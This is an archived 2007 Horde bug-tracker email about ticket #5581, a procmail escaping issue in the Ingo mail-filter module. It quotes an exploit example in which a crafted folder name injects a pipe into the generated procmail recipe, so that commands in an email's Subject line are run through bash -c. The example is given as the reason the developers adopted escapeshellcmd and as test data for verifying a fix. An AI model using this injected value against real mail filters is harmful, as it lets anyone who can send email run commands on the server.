[Tickets #5581] Re: procmail expression problem
bugs at bugs.horde.org
bugs at bugs.horde.org
Wed Aug 22 01:24:07 UTC 2007
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=5581
-----------------------------------------------------------------------
Ticket | 5581
Updated By | Chuck Hagenbuch <chuck at horde.org>
Summary | procmail expression problem
Queue | Ingo
Version | 1.1.2
Type | Bug
State | Feedback
Priority | 1. Low
Owners |
-----------------------------------------------------------------------
Chuck Hagenbuch <chuck at horde.org> (2007-08-21 18:24) wrote:
> Seems reasonable. Do we have any test files? It would be super easy
> to verify the results then and/or show them to my local procmail
> expert.
I'm not sure exactly which test data you're looking for, but this is the
exploit example that caused us to start using escapeshellcmd:
The Foldername
|formail -rA "X-Loop:hisemailaddres at excample.com" | (
cat - ;myCmd="$MATCH"; echo "Executing: $myCmd" ;
bash -c "$myCmd"
) |$SENDMAIL -oi -t
would result in a prcmail like the following
* ^From:.*hisemailaddres at excample\.com
{
:0
* ^Subject:.*exec_command\/.*$
|formail -rA "X-Loop:hisemailaddres at excample.com" | (
cat -
;
myCmd="$MATCH"; echo "Executing: $myCmd" ; bash -c
"$myCmd"
)
| $SENDMAIL -oi -t
}
More information about the bugs
mailing list